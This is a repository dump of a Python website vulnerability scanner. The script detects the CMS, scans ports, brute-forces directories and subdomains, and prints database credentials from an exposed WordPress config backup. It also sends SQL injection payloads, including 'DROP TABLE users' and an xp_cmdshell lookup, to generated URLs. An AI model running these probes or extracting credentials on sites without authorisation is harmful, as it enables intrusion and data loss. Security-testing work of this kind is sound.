439 | "storemanager/contents/item.php?page_code=", 440 | "customer/board.htm?mode=", 441 | "help/com_view.html?code=", 442 | "n_replyboard.php?typeboard=", 443 | "eng_board/view.php?T****=", 444 | "prev_results.php?prodID=", 445 | "bbs/view.php?no=", 446 | "gnu/?doc=", 447 | "zb/view.php?uid=", 448 | "global/product/product.php?gubun=", 449 | "m_view.php?ps_db=", 450 | "productlist.php?tid=", 451 | "product-list.php?id=", 452 | "onlinesales/product.php?product_id=", 453 | "garden_equipment/Fruit-Cage/product.php?pr=", 454 | "product.php?shopprodid=", 455 | "product_info.php?products_id=", 456 | "productlist.php?tid=", 457 | "showsub.php?id=", 458 | "productlist.php?fid=", 459 | "products.php?cat=", 460 | "product-list.php?id=", 461 | "product.php?sku=", 462 | "store/product.php?productid=", 463 | "products.php?cat=", 464 | "productList.php?cat=", 465 | "product_detail.php?product_id=", 466 | "product.php?pid=", 467 | "view_items.php?id=", 468 | "more_details.php?id=", 469 | "county-facts/diary/vcsgen.php?id=", 470 | "idlechat/message.php?id=", 471 | "podcast/item.php?pid=", 472 | "products.php?act=", 473 | "details.php?prodId=", 474 | "socsci/events/full_details.php?id=", 475 | "ourblog.php?categoryid=", 476 | "mall/more.php?ProdID=", 477 | "archive/get.php?message_id=", 478 | "review/review_form.php?item_id=", 479 | "english/publicproducts.php?groupid=", 480 | "news_and_notices.php?news_id=", 481 | "rounds-detail.php?id=", 482 | "gig.php?id=", 483 | "board/view.php?no=", 484 | "index.php?modus=", 485 | "news_item.php?id=", 486 | "rss.php?cat=", 487 | "products/product.php?id=", 488 | "details.php?ProdID=", 489 | "els_/product/product.php?id=", 490 | "store/description.php?iddesc=", 491 | "socsci/news_items/full_story.php?id=", 492 | "naboard/memo.php?bd=", 493 | "bookmark/mybook/bookmark.php?bookPageNo=", 494 | "board/board.html?table=", 495 | "kboard/kboard.php?board=", 496 | "order.asp?lotid=", 497 | "goboard/front/board_view.php?code=", 498 | "bbs/bbsView.php?id=", 499 | "boardView.php?bbs=", 500 | "eng/rgboard/view.php?&bbs_id=", 501 | "product/product.php?cate=", 502 | "content.php?p=", 503 | "page.php?module=", 504 | "?pid=", 505 | "bookpage.php?id=", 506 | "cbmer/congres/page.php?LAN=", 507 | "content.php?id=", 508 | "news.php?ID=", 509 | "photogallery.php?id=", 510 | "index.php?id=", 511 | "product/product.php?product_no=", 512 | "nyheder.htm?show=", 513 | "book.php?ID=", 514 | "print.php?id=", 515 | "detail.php?id=", 516 | "book.php?id=", 517 | "content.php?PID=", 518 | "more_detail.php?id=", 519 | "content.php?id=", 520 | "view_items.php?id=", 521 | "view_author.php?id=", 522 | "main.php?id=", 523 | "english/fonction/print.php?id=", 524 | "magazines/adult_magazine_single_page.php?magid=", 525 | "product_details.php?prodid=", 526 | "magazines/adult_magazine_full_year.php?magid=", 527 | "products/card.php?prodID=", 528 | "catalog/product.php?cat_id=", 529 | "e_board/modifyform.html?code=", 530 | "community/calendar-event-fr.php?id=", 531 | "products.php?p=", 532 | "news.php?id=", 533 | "aktuelles/meldungen-detail.php?id=", 534 | "item.php?id=", 535 | "obio/detail.php?id=", 536 | "page/de/produkte/produkte.php?prodID=", 537 | "packages_display.php?ref=", 538 | "shop/index.php?cPath=", 539 | "modules.php?bookid=", 540 | "view/7/9628/1.html?reply=", 541 | "product_details.php?prodid=", 542 | "catalog/product.php?pid=", 543 | "rating.php?id=", 544 | "?page=", 545 | "catalog/main.php?cat_id=", 546 | "index.php?page=", 547 | "detail.php?prodid=", 548 | "products/product.php?pid=", 549 | "book_detail.php?BookID=", 550 | "catalog/main.php?cat_id=", 551 | "default.php?cPath=", 552 | "category.php?catid=", 553 | "categories.php?cat=", 554 | "hm/inside.php?id=", 555 | "index.php?area_id=", 556 | "gallery.php?id=", 557 | "products.php?cat=", 558 | "media/pr.php?id=", 559 | "books/book.php?proj_nr=", 560 | "products/card.php?prodID=", 561 | "general.php?id=", 562 | "news.php?t=", 563 | "usb/devices/showdev.php?id=", 564 | "content/detail.php?id=", 565 | "templet.php?acticle_id=", 566 | "news/news/title_show.php?id=", 567 | "product.php?id=", 568 | "index.php?url=", 569 | "cryolab/content.php?cid=", 570 | "ls.php?id=", 571 | "s.php?w=", 572 | "abroad/page.php?cid=", 573 | "bayer/dtnews.php?id=", 574 | "news/temp.php?id=", 575 | "index.php?url=", 576 | "book/bookcover.php?bookid=", 577 | "index.php/en/component/pvm/?view=", 578 | "product/list.php?pid=", 579 | "software_categories.php?cat_id=", 580 | "print.php?sid=", 581 | "about.php?cartID=", 582 | "accinfo.php?cartId=", 583 | "acclogin.php?cartID=", 584 | "add.php?bookid=", 585 | "add_cart.php?num=", 586 | "addcart.php?", 587 | "addItem.php", 588 | "add-to-cart.php?ID=", 589 | "addToCart.php?idProduct=", 590 | "addtomylist.php?ProdId=", 591 | "adminEditProductFields.php?intProdID=", 592 | "advSearch_h.php?idCategory=", 593 | "affiliate.php?ID=", 594 | "affiliate-agreement.cfm?storeid=", 595 | "affiliates.php?id=", 596 | "ancillary.php?ID=", 597 | "archive.php?id=", 598 | "article.php?id=", 599 | "phpx?PageID", 600 | "basket.php?id=", 601 | "Book.php?bookID=", 602 | "book_list.php?bookid=", 603 | "book_view.php?bookid=", 604 | "BookDetails.php?ID=", 605 | "browse.php?catid=", 606 | "browse_item_details.php", 607 | "Browse_Item_Details.php?Store_Id=", 608 | "buy.php?", 609 | "buy.php?bookid=", 610 | "bycategory.php?id=", 611 | "cardinfo.php?card=", 612 | "cart.php?action=", 613 | "cart.php?cart_id=", 614 | "item.php?id=", 615 | "item_book.php?CAT=", 616 | "www/index.php?page=", 617 | "schule/termine.php?view=", 618 | "goods_detail.php?data=", 619 | "storemanager/contents/item.php?page_code=", 620 | "customer/board.htm?mode=", 621 | "help/com_view.html?code=", 622 | "n_replyboard.php?typeboard=", 623 | "eng_board/view.php?T****=", 624 | "prev_results.php?prodID=", 625 | "bbs/view.php?no=", 626 | "gnu/?doc=", 627 | "zb/view.php?uid=", 628 | "global/product/product.php?gubun=", 629 | "m_view.php?ps_db=", 630 | "productlist.php?tid=", 631 | "product-list.php?id=", 632 | "onlinesales/product.php?product_id=", 633 | "garden_equipment/Fruit-Cage/product.php?pr=", 634 | "product.php?shopprodid=", 635 | "product_info.php?products_id=", 636 | "productlist.php?tid=", 637 | "showsub.php?id=", 638 | "productlist.php?fid=", 639 | "products.php?cat=", 640 | "product-list.php?id=", 641 | "product.php?sku=", 642 | "store/product.php?productid=", 643 | "products.php?cat=", 644 | "productList.php?cat=", 645 | "product_detail.php?product_id=", 646 | "product.php?pid=", 647 | "view_items.php?id=", 648 | "more_details.php?id=", 649 | "county-facts/diary/vcsgen.php?id=", 650 | "idlechat/message.php?id=", 651 | "podcast/item.php?pid=", 652 | "products.php?act=", 653 | "details.php?prodId=", 654 | "socsci/events/full_details.php?id=", 655 | "ourblog.php?categoryid=", 656 | "mall/more.php?ProdID=", 657 | "archive/get.php?message_id=", 658 | "review/review_form.php?item_id=", 659 | "english/publicproducts.php?groupid=", 660 | "news_and_notices.php?news_id=", 661 | "rounds-detail.php?id=", 662 | "gig.php?id=", 663 | "board/view.php?no=", 664 | "index.php?modus=", 665 | "news_item.php?id=", 666 | "rss.php?cat=", 667 | "products/product.php?id=", 668 | "details.php?ProdID=", 669 | "els_/product/product.php?id=", 670 | "store/description.php?iddesc=", 671 | "socsci/news_items/full_story.php?id=", 672 | "modules/forum/index.php?topic_id=", 673 | "feature.php?id=", 674 | "products/Blitzball.htm?id=" 675 | ] 676 | -------------------------------------------------------------------------------- /Site-Scanner.py: -------------------------------------------------------------------------------- 1 | # Site-Scanner - Website Vulnerability Assessment Tool. 2 | # Version: 1.8.0 3 | # Date: Jul 13, 2024 4 | # Copyrights © Tal.M 5 | 6 | import requests, time,socket,concurrent.futures 7 | import json, re, signal, sys, ssl 8 | from bs4 import BeautifulSoup 9 | from urllib.parse import urlparse, urljoin 10 | import datetime 11 | 12 | def signal_handler(sig, frame): 13 | print("\nShutting down...") 14 | time.sleep(1) 15 | exit(1) 16 | 17 | def print_logo(): 18 | with open("src/logo.txt", "r") as logo_file: 19 | logo = logo_file.read() 20 | print(logo) 21 | 22 | 23 | def get_url(): 24 | while True: 25 | try: 26 | url = input('\nEnter URL: ').strip() # Remove leading/trailing whitespace 27 | if not url: 28 | print('\033[31mError:\033[0m URL cannot be empty.') 29 | continue 30 | if not url.startswith(('http://', 'https://')): 31 | print('\033[31mError:\033[0m URL must start with http:// or https://') 32 | continue 33 | if url.endswith('/'): 34 | url = url[:-1] # Remove trailing slash 35 | return url 36 | except KeyboardInterrupt: 37 | print("\n\nShutting down...") 38 | time.sleep(1) 39 | exit(0) 40 | except Exception as e: 41 | print('\033[31mAn error occurred:\033[0m', e) 42 | 43 | def load_cms_metadata(json_file): 44 | with open(json_file, "r") as file: 45 | return json.load(file) 46 | 47 | def detect_cms_and_version(url, cms_metadata): 48 | response = requests.get(url) 49 | if response.status_code == 200: 50 | html_content = response.text 51 | detected_cms, detected_version = "Unknown CMS", None 52 | 53 | for cms, metadata in cms_metadata.items(): 54 | indicators = metadata.get("identification", {}).get("indicators", []) 55 | version_indicators = metadata.get("version_detection", {}).get("indicators", []) 56 | 57 | for indicator in indicators: 58 | if re.search(indicator, html_content, re.I): 59 | detected_cms = cms 60 | break 61 | 62 | for version_indicator in version_indicators: 63 | version_match = re.search(version_indicator, html_content) 64 | if version_match: 65 | detected_version = version_match.group(1) 66 | break 67 | 68 | if detected_cms and detected_version: 69 | break 70 | 71 | return detected_cms, detected_version 72 | else: 73 | print(f"Error: Unable to fetch URL: {url}") 74 | return None, None 75 | 76 | 77 | def find_wp_config_backup(base_url): 78 | try: 79 | wp_config_backup_url = urljoin(base_url, "/wp-config.php-bak") 80 | 81 | # Fetch the content of the wp-config.php.bak file 82 | response = requests.get(wp_config_backup_url) 83 | if response.status_code == 200: 84 | 85 | print("\n\033[31m[+] Major Leak Found!\033[0m\n") 86 | # Extract database configuration information 87 | wp_config_content = response.text 88 | db_name = wp_config_content.split("DB_NAME', '")[1].split("'")[0] 89 | db_user = wp_config_content.split("DB_USER', '")[1].split("'")[0] 90 | db_password = wp_config_content.split("DB_PASSWORD', '")[1].split("'")[0] 91 | db_host = wp_config_content.split("DB_HOST', '")[1].split("'")[0] 92 | # Print the database configuration information 93 | print(f"Database Name: {db_name}") 94 | print(f"Database User: {db_user}") 95 | print(f"Database Password: {db_password}") 96 | print(f"Database Host: {db_host}") 97 | print(f"\nFor more info: {wp_config_backup_url}") 98 | 99 | except requests.RequestException as e: 100 | print(f"Error fetching URL {wp_config_backup_url}: {e}") 101 | 102 | 103 | 104 | def search_vulnerabilities(cms, version,url): 105 | if version: 106 | major_minor_version = ".".join(version.split(".")[:2]) 107 | search_query = f"{cms}+{major_minor_version}" 108 | else: 109 | major_minor_version = "" 110 | search_query = f"{cms}" 111 | 112 | search_url = f"https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword={search_query}" 113 | headers = { 114 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 115 | } 116 | 117 | if cms_name=="WordPress": 118 | find_wp_config_backup(url) 119 | 120 | try: 121 | response = requests.get(search_url, headers=headers) 122 | response.raise_for_status() # Raise an exception for non-200 status codes 123 | 124 | soup = BeautifulSoup(response.text, 'html.parser') 125 | cve_info = soup.find("div", class_="smaller", style="background-color:#e0dbd2; padding:3px; border:1px solid #706c60; margin-bottom:10px") 126 | 127 | if cve_info: 128 | cve_count = cve_info.find("b").text.strip() 129 | return f"\n\033[31m{cve_count}\033[0m CVE Records found for {cms} {major_minor_version}\nSee more at {search_url}" 130 | else: 131 | return f"\nNo CVE Records found for {cms} {major_minor_version}." 132 | 133 | except requests.RequestException as e: 134 | return f"Error: {str(e)}" 135 | 136 | def search_login_variations(cms_name, url, cms_metadata): 137 | cms_info = cms_metadata.get(cms_name, {}) # Use the original CMS name without lowercasing 138 | 139 | login_pages = cms_info.get("login_pages", []) 140 | 141 | valid_login_page = None 142 | for page in login_pages: 143 | response = requests.get(f"{url}{page}") 144 | if response.status_code == 200: 145 | valid_login_page = f"{url}{page}" 146 | break 147 | if valid_login_page: 148 | print("\n[-] " + valid_login_page) 149 | else: 150 | print("\n[-] Login page not found") 151 | 152 | 153 | def get_ip(url): 154 | try: 155 | parsed_url = urlparse(url) 156 | domain = parsed_url.netloc 157 | ip_address = socket.gethostbyname(domain) 158 | return ip_address 159 | except Exception as e: 160 | print("Error:", e) 161 | return "N/A" 162 | 163 | def get_server_info(res): 164 | try: 165 | response = res 166 | end_time = time.time() 167 | ip_address = get_ip(url) 168 | if response.status_code == 200: 169 | # Load Time Calculation. 170 | load_time = end_time - start_time 171 | server_headers = response.headers 172 | server = server_headers.get('Server', 'N/A') 173 | os = server_headers.get('X-Powered-By', 'N/A') 174 | 175 | print(f"\n\033[31mLoad Time:\033[0m {load_time:.1f} seconds") 176 | print(f"\033[31mIP Address:\033[0m {ip_address}") 177 | print(f"\033[31mServer Software:\033[0m {server}") 178 | print(f"\033[31mServer OS:\033[0m {os}") 179 | else: 180 | print('Failed to fetch URL:', response.status_code) 181 | time.sleep(1) 182 | exit(1) 183 | except requests.exceptions.RequestException as e: 184 | print("Error:", e) 185 | 186 | def scan_port(ip, port): 187 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 188 | sock.settimeout(1) 189 | result = sock.connect_ex((ip, port)) 190 | sock.close() 191 | if result == 0: 192 | return port 193 | 194 | def get_open_ports(ip_address): 195 | 196 | open_ports = [] 197 | with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: 198 | future_to_port = {executor.submit(scan_port, ip_address, port): port for port in range(1, 1024)} 199 | for future in concurrent.futures.as_completed(future_to_port): 200 | port = future_to_port[future] 201 | if future.result() is not None: 202 | open_ports.append(port) 203 | 204 | return open_ports 205 | 206 | def check_xss_vulnerability(url): 207 | payloads = [ 208 | "", 209 | "", 210 | "Click me" 211 | ] 212 | headers = { 213 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'} 214 | 215 | response = requests.get(url, headers=headers) 216 | 217 | if response.status_code != 200: 218 | print("Failed to fetch the URL. Status Code:", response.status_code) 219 | return 220 | 221 | soup = BeautifulSoup(response.text, 'html.parser') 222 | 223 | # Testing input fields 224 | input_fields = soup.find_all('input') 225 | found_vulnerabilities = False 226 | 227 | for field in input_fields: 228 | for payload in payloads: 229 | data = {field.get('name'): payload} 230 | test_url = urljoin(url, field.get('action') or '') 231 | test_response = requests.post(test_url, data=data, headers=headers) 232 | 233 | if payload in test_response.text: 234 | found_vulnerabilities = True 235 | print("Potential XSS vulnerability found in:", test_url) 236 | print("Payload:", payload) 237 | 238 | # Testing JS event attributes 239 | script_tags = soup.find_all(string=re.compile(r'on\w+=".*?"')) 240 | for tag in script_tags: 241 | for payload in payloads: 242 | test_url = urljoin(url, tag) 243 | test_response = requests.get(test_url, headers=headers) 244 | 245 | if payload in test_response.text: 246 | found_vulnerabilities = True 247 | print("Potential XSS vulnerability found in:", test_url) 248 | print("Payload:", payload) 249 | 250 | # Testing URL parameters 251 | for payload in payloads: 252 | test_url = url + "?" + payload 253 | test_response = requests.get(test_url, headers=headers) 254 | 255 | if payload in test_response.text: 256 | found_vulnerabilities = True 257 | print("Potential XSS vulnerability found in:", test_url) 258 | print("Payload:", payload) 259 | 260 | # No vulnerabilities found 261 | if not found_vulnerabilities: 262 | print("No XSS Vulnerabilities found.") 263 | 264 | def is_valid_url(url): 265 | response = requests.head(url) 266 | return response.status_code == 200 267 | 268 | def generate_test_urls(domain, patterns_file): 269 | test_urls = [] 270 | 271 | # Read patterns from the JSON file 272 | with open(patterns_file, 'r') as file: 273 | patterns = json.load(file) 274 | 275 | # Generate variations based on patterns 276 | for pattern in patterns: 277 | full_url = urljoin(domain, pattern) 278 | 279 | # Check if the generated URL is valid 280 | test_urls.append(full_url) 281 | 282 | return test_urls 283 | 284 | def sql_injection_vulnerability(url): 285 | payloads = [ 286 | "'" 287 | "1' OR '1'='1", 288 | "1' OR '1'='1' --", 289 | "1' OR '1'='1' #", 290 | "1' OR '1'='1'/*", 291 | "1' OR '1'='1'/*", 292 | "1; DROP TABLE users --", 293 | "' OR 'x'='x", 294 | "UNION SELECT null, username, password FROM users --", 295 | "UNION ALL SELECT null, version(), database() --", 296 | 297 | "1' AND 1=convert(int, @@version) --", 298 | "' AND 1=convert(int, @@version) --", 299 | 300 | "1' WAITFOR DELAY '0:0:5' --", 301 | 302 | "1' AND 1=1 --", 303 | "1' AND 1=2 --", 304 | 305 | "1' UNION SELECT null, version(), null --", 306 | "1' UNION SELECT null, database(), null --", 307 | 308 | "1'; EXEC xp_cmdshell('nslookup example.com') --", 309 | 310 | "1' AND SLEEP(5) --", 311 | "1' AND 1=1; IF (1=1) WAITFOR DELAY '0:0:5' --", 312 | 313 | "1' AND IF(1=1, SLEEP(5), 0) --", 314 | "1' AND IF(1=1, BENCHMARK(5000000, SHA1(1)), 0) --" 315 | ] 316 | 317 | headers = { 318 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'} 319 | test_urls = generate_test_urls(url, "src/patterns.json") 320 | 321 | for test_url in test_urls: 322 | for payload in payloads: 323 | full_url = f"{test_url}{payload}" if '?' in test_url else f"{test_url}?param={payload}" 324 | response = requests.get(full_url, headers=headers) 325 | 326 | if "error" in response.text.lower() and response.status_code == 200 or "syntax error" in response.text.lower(): 327 | print("SQL injection vulnerability found in:", test_url) 328 | print("Payload:", payload) 329 | 330 | # Printing the error message. 331 | soup = BeautifulSoup(response.text, 'html.parser') 332 | error_tag = soup.find(string=lambda text: "error" in text.lower() or "syntax error" in text.lower()) 333 | if error_tag: 334 | error_message = error_tag.strip() 335 | print("Error message:", error_message) 336 | return 337 | 338 | 339 | def robots_txt(url): 340 | try: 341 | parsed_url = urlparse(url) 342 | robots_url = f"{parsed_url.scheme}://{parsed_url.netloc}/robots.txt" 343 | response = requests.get(robots_url) 344 | if response.status_code == 200: 345 | print("\n[+] Fetching robots.txt...\n") 346 | for line in response.text.split('\n'): 347 | if line.strip().startswith('Disallow:'): 348 | print(line.strip()) 349 | else: 350 | print("\nFailed to fetch robots.txt. Status Code:", response.status_code) 351 | except Exception as e: 352 | print("Error:", e) 353 | 354 | 355 | def refactor_url(url): 356 | parsed_url = urlparse(url) 357 | base_url = f"{parsed_url.scheme}://{parsed_url.netloc}" 358 | if url == base_url: 359 | return url 360 | print(f"Specefied URL: {url}\n") 361 | print(f"1. Stripped URL: {base_url}") 362 | print("2. Enter new URL") 363 | print(f"3. Continue with: {url}") 364 | user = input("\nEnter your selection: ") 365 | if user == '1': 366 | url = base_url 367 | if user == '2': 368 | url = get_url() 369 | return url 370 | 371 | def check_directory(url, directory): 372 | full_url = url.rstrip('/') + '/' + directory 373 | try: 374 | response = requests.get(full_url, timeout=5) 375 | if response.status_code in [200, 204, 301, 302, 307, 401]: 376 | return (full_url, response.status_code) 377 | except requests.exceptions.RequestException: 378 | pass 379 | 380 | def search_directories(url, wordlist_path): 381 | with open(wordlist_path, 'r') as f: 382 | directories = f.read().splitlines() 383 | 384 | 385 | with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor: 386 | future_to_directory = {executor.submit(check_directory, url, directory): directory for directory in directories} 387 | for future in concurrent.futures.as_completed(future_to_directory): 388 | result = future.result() 389 | if result: 390 | print(f"[+] {result[0]} (Status: {result[1]})") 391 | 392 | return 393 | 394 | def check_security_headers(url): 395 | headers_to_check = [ 396 | "Content-Security-Policy", 397 | "X-Content-Type-Options", 398 | "X-Frame-Options", 399 | "Strict-Transport-Security", 400 | "X-XSS-Protection", 401 | "Referrer-Policy", 402 | "Feature-Policy", 403 | "Expect-CT", 404 | "Content-Encoding", 405 | "Permissions-Policy", 406 | "Cache-Control" 407 | ] 408 | 409 | response = requests.get(url) 410 | missing_headers = [] 411 | 412 | for header in headers_to_check: 413 | if header not in response.headers: 414 | missing_headers.append(f"[+] {header}") 415 | 416 | if missing_headers: 417 | missing_headers_str = '\n'.join(missing_headers) 418 | print(f"Missing security headers for {url}:\n{missing_headers_str}") 419 | else: 420 | print(f"All security headers are present for {url}") 421 | 422 | def check_subdomain(scheme, base_url, subdomain): 423 | full_url = f"{scheme}://{subdomain}.{base_url}" 424 | try: 425 | response = requests.get(full_url, timeout=5) 426 | if response.status_code == 200: 427 | return full_url, response.status_code 428 | except requests.RequestException: 429 | return None 430 | 431 | def search_subdomains(url, wordlist_path): 432 | parsed_url = urlparse(url) 433 | scheme = parsed_url.scheme 434 | base_url = parsed_url.netloc 435 | 436 | with open(wordlist_path, 'r') as f: 437 | subdomains = f.read().splitlines() 438 | 439 | with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: 440 | future_to_subdomain = {executor.submit(check_subdomain, scheme, base_url, subdomain): subdomain for subdomain in subdomains} 441 | for future in concurrent.futures.as_completed(future_to_subdomain): 442 | result = future.result() 443 | if result: 444 | print(f"[+] {result[0]} (Status: {result[1]})") 445 | 446 | 447 | def check_ssl_certificate(url): 448 | if url.startswith("https://"): 449 | url = url.replace("https://", "") 450 | else: 451 | print("URL must start with https://") 452 | return 453 | try: 454 | context = ssl.create_default_context() 455 | with context.wrap_socket(socket.socket(), server_hostname=url) as sock: 456 | sock.settimeout(5) # Adjust timeout as needed 457 | sock.connect((url, 443)) # Connect to the website's HTTPS port 458 | ssl_info = sock.getpeercert() 459 | 460 | # Extract relevant certificate information 461 | issuer_info = ssl_info['issuer'] 462 | country = issuer_info[0][0][1] if len(issuer_info[0]) > 0 else 'N/A' 463 | organization = issuer_info[1][0][1] if len(issuer_info[1]) > 0 else 'N/A' 464 | common_name = issuer_info[2][0][1] if len(issuer_info[2]) > 0 else 'N/A' 465 | expiration_date = datetime.datetime.strptime(ssl_info['notAfter'], "%b %d %H:%M:%S %Y %Z") 466 | 467 | # Check validity and expiration 468 | current_date = datetime.datetime.now() 469 | days_until_expire = (expiration_date - current_date).days 470 | 471 | # Print SSL/TLS Certificate Information 472 | print(f"[+] Issuer: Country:{country}, Org:{organization}, Name:{common_name}") 473 | print(f"[+] Expiration Date: {expiration_date.strftime('%Y-%m-%d')}") 474 | print(f"[+] Days until Expiry: {days_until_expire}") 475 | 476 | except ssl.SSLError as e: 477 | print(f"\nError checking SSL/TLS certificate for {url}: {str(e)}") 478 | except Exception as e: 479 | print(f"\nError: {str(e)}") 480 | 481 | 482 | def print_menu(): 483 | print("\n\033[31m1.CMS Detection & Vulnerability Report\033[0m") 484 | print("\033[31m2.Admin Panel Auth Detection\033[0m") 485 | print("\033[31m3.Robots.txt Disallowed\033[0m") 486 | print("\033[31m4.Check Security Headers\033[0m") 487 | print("\033[31m5.Validate SSL Certificate\033[0m") 488 | print("\033[31m6.Open Ports Scan\033[0m - Heavy Op") 489 | print("\033[31m7.Scanning Directories\033[0m") 490 | print("\033[31m8.Scanning Subdomains\033[0m") 491 | print("\033[31m9.SQL Injection Detection\033[0m") 492 | print("\033[31m10.XSS Detection\033[0m") 493 | print("\033[31m0.Exit\033[0m") 494 | 495 | 496 | if __name__ == '__main__': 497 | print_logo() 498 | url = get_url() 499 | 500 | print("\nFetching URL...") 501 | start_time = time.time() 502 | response = requests.get(url) 503 | get_server_info(response) 504 | 505 | # Reducing load by importing files in the main stack. 506 | cms_metadata = load_cms_metadata("src/cms_metadata.json") 507 | 508 | #Init value if CMS Detection skipped. 509 | cms_name = "Unknown CMS" 510 | 511 | while True: 512 | signal.signal(signal.SIGINT, signal_handler) 513 | print_menu() 514 | user = input("\033[32mSelect Task:\033[0m") 515 | # Switch case tasks 516 | if user == "1": 517 | print(f"\n[+] Detecting CMS...") 518 | cms_name, cms_version = detect_cms_and_version(url, cms_metadata) 519 | print("\nDetected CMS:", cms_name) 520 | if cms_version != None: 521 | print("Detected Version:", cms_version) 522 | if cms_name != "Unknown CMS": 523 | print("\n[+] Searching Vulnerabilities") 524 | print(search_vulnerabilities(cms_name, cms_version, url)) 525 | 526 | if user == "2": 527 | print("\n[+] Detecting Admin Panel Auth...") 528 | search_login_variations(cms_name, url,cms_metadata) 529 | 530 | if user == "3": 531 | robots_txt(url) 532 | 533 | if user == "4": 534 | print("\n[+] Checking Security Headers...\n") 535 | check_security_headers(url) 536 | 537 | if user == "5": 538 | print(url) 539 | print("\n[+] Checking SSL Certificate...\n") 540 | check_ssl_certificate(url) 541 | 542 | if user == "6": 543 | print("\n[+] Scanning Ports...\n") 544 | print(get_open_ports(get_ip(url))) 545 | 546 | if user == "7": 547 | print("\n[+] Scanning Directories...\n") 548 | wordlist_path = "src/dir.txt" 549 | url = refactor_url(url) 550 | # Extract base URL up to the domain suffix 551 | search_directories(url, wordlist_path) 552 | 553 | if user == "8": 554 | print("\n[+] Scanning Subdomains...\n") 555 | wordlist_path = "src/sub.txt" 556 | url = refactor_url(url) 557 | # Extract base URL up to the domain suffix 558 | search_subdomains(url, wordlist_path) 559 | 560 | if user == "9": 561 | print("\n[+] Looking for SQL Injection Vulnerabilities...") 562 | sql_injection_vulnerability(url) 563 | 564 | if user == "10": 565 | print("\n[+] Looking for XSS Vulnerabilities...") 566 | check_xss_vulnerability(url) 567 | 568 | if user == "0": 569 | print("\nShutting down...") 570 | time.sleep(1) 571 | exit(1) 572 | -------------------------------------------------------------------------------- /src/dir.txt: -------------------------------------------------------------------------------- 1 | images 2 | index.php 3 | s241 4 | css 5 | js 6 | wp-content 7 | wp-content/mysql.sql 8 | robots.txt 9 | assets 10 | wp-admin 11 | wp-includes 12 | img 13 | fonts 14 | license.txt 15 | wp-login.php 16 | xmlrpc.php 17 | wp-load.php 18 | wp-blog-header.php 19 | wp-trackback.php 20 | wp-mail.php 21 | wp-links-opml.php 22 | vendor 23 | wp-cron.php 24 | wp-comments-post.php 25 | wp-activate.php 26 | wp-settings.php 27 | wp-signup.php 28 | wp-config-sample.php 29 | .htaccess 30 | wp-config.php 31 | .git 32 | web.config 33 | admin 34 | uploads 35 | templates 36 | sitemap.xml 37 | app 38 | cgi-bin 39 | system 40 | themes 41 | composer.json 42 | cache 43 | includes 44 | README.md 45 | static 46 | mix-manifest.json 47 | files 48 | plugins 49 | .DS_Store 50 | media 51 | application 52 | manifest.json 53 | config.php 54 | .well-known 55 | composer.lock 56 | upload 57 | scripts 58 | lib 59 | public 60 | config 61 | pdf 62 | test 63 | data 64 | modules 65 | storage 66 | .idea 67 | news 68 | blog 69 | error_log 70 | resources 71 | .gitignore 72 | docs 73 | video 74 | api 75 | catalog 76 | _notes 77 | src 78 | library 79 | scss 80 | BingSiteAuth.xml 81 | styles 82 | videos 83 | package.json 84 | inc 85 | about 86 | ads.txt 87 | test.php 88 | install 89 | font 90 | bootstrap 91 | node_modules 92 | browserconfig.xml 93 | tools 94 | tmp 95 | download 96 | build 97 | ads 98 | 404.php 99 | php 100 | image 101 | api.php 102 | php.ini 103 | info.php 104 | content 105 | ckeditor 106 | footer.php 107 | downloads 108 | crossdomain.xml 109 | common 110 | include 111 | icons 112 | header.php 113 | controllers 114 | mobile 115 | email 116 | tests 117 | classes 118 | bundles 119 | en 120 | dist 121 | sass 122 | svg 123 | package-lock.json 124 | keywords 125 | contact 126 | Nginx-1.12_vhost.conf 127 | links.txt 128 | support 129 | libs 130 | ajax 131 | search 132 | jobs 133 | wp-snapshots 134 | template 135 | components 136 | cms 137 | OneSignalSDKWorker.js 138 | temp 139 | loader.php 140 | bin 141 | OneSignalSDKUpdaterWorker.js 142 | mojo-package.sh 143 | phpinfo.php 144 | database 145 | logs 146 | sitemap.php 147 | maps 148 | demo 149 | stylesheets 150 | style 151 | sites 152 | sitemap 153 | services 154 | login.php 155 | html 156 | contact.php 157 | sitemaps 158 | local 159 | games 160 | audio 161 | WEB-INF 162 | webfonts 163 | gulpfile.js 164 | routes 165 | javascript 166 | pages 167 | newsletter 168 | home 169 | help 170 | bfb 171 | views 172 | var 173 | search.php 174 | _wpeprivate 175 | Templates 176 | packages 177 | language 178 | icon 179 | frontend 180 | favicon 181 | events 182 | documents 183 | web 184 | translations 185 | privacy 186 | dev 187 | console 188 | apps 189 | nbproject 190 | libraries 191 | design 192 | ckfinder 193 | banner 194 | qa-theme 195 | qa-tests 196 | qa-src 197 | qa-plugin 198 | qa-lang 199 | qa-include 200 | qa-external-example 201 | qa-content 202 | qa-cache 203 | phpunit.xml 204 | logout.php 205 | javascripts 206 | init.php 207 | theme 208 | sports 209 | photos 210 | mails 211 | log 212 | localization 213 | core 214 | bitrix 215 | banners 216 | backup 217 | backend 218 | site 219 | quotes.txt 220 | misc 221 | logo 222 | lang 223 | engine 224 | careers 225 | about.php 226 | Scripts 227 | .vscode 228 | wp 229 | stats 230 | speedtest 231 | logos 232 | less 233 | dashboard 234 | app_dev.php 235 | site.webmanifest 236 | rss 237 | radio 238 | favicons 239 | app.php 240 | webservice 241 | mail 242 | lp 243 | json 244 | forms 245 | db 246 | coupons 247 | asset 248 | artisan 249 | archive 250 | translate 251 | swal 252 | pdfconverter 253 | override 254 | legal 255 | global 256 | front 257 | font-awesome 258 | elFinder-2.1.51 259 | yss 260 | webpack.mix.js 261 | transit 262 | trailertab 263 | textfrompc 264 | successpages 265 | smartSearch 266 | singleImage.php 267 | shop 268 | searchtab 269 | searchselect 270 | searchsafe 271 | searchprivacy 272 | searchplus 273 | searcheasy 274 | searchAnonymous 275 | products 276 | pokemon 277 | packagetracker 278 | overlay 